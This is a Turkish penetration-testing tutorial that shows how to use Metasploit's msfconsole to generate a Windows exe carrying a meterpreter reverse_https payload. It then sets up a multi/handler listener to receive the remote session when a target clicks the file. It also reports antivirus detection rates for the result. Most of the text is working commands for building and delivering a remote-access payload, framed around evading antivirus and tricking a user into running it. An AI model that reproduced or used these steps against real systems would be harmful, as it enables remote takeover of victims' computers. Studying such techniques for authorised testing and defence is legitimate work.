Msfconsole Arayüzündeki Payload Seçeneği Kullanarak Zararlı Yazılım Oluşturma

Sızma testleri sırasında anti-virüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Metasploit tarafından sağlanan msfconsole arayüzündeki payload seçeneği kullanılarak anti-virüslere yakalanmayan zararlı bir uygulama oluşturulacaktır.

VirusTotal sonuçlarından da görüleceği gibi, msfconsole içerisindeki payload seçeneği kullanılarak oluşturulan zararlı yazılımlar bir çok anti-virüs tarafından tespit edilebilmektedir. Üstelik, Metasploit Framework’te, msfpayload (ve msfencode modüllerine) destek çekilmiştir. Bu modüller yerine, MsfVenom ile zararlı yazılım oluşturulması tavsiye edilmektedir.

Zararlı bir exe uygulamasını oluşturmak için örnek bir komut aşağıdaki gibidir:

use payload/windows/meterpreter/reverse_https
set LHOST 192.168.0.130
set LPORT 443
set EXITFUNC process
generate -t exe -f /root/Desktop/ZararliUygulama.exe

Kali makinenin /root/Desktop dizininde oluşan uygulama dosyası (ZararliUygulama.exe) istemci bir bilgisayara gönderilir. Bu uygulama tıklandığında bağlantı elde edilmesi için “exploit/multi/handler” modülü kullanılır:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST 192.168.0.130
set LPORT 443
show options

Exploit işlemi başlatılır ve exe dosyasının tıklanması için beklenilir.

exploit -j

Zararlı uygulama tıklandığı durumda Payload çalışır ve bağlantı kurulur.

sessions -l

Hazırlanan zararlı uygulamanın, günümüzde bir çok anti-virüs tarafından yakalandığı görülmektedir. Virüs.mu (henüz internete açılmamıştır) tarafından gerçekleştirilen tarama sonucunda 20 antivirüsten 16 tanesi tarafından yakalandığı görülmektedir.

Bunun yanında VirusTotal tarafından gerçekleştirilen tarama sonucunda 55 antivirüsten 37 tanesi tarafından yakalandığı görülmektedir.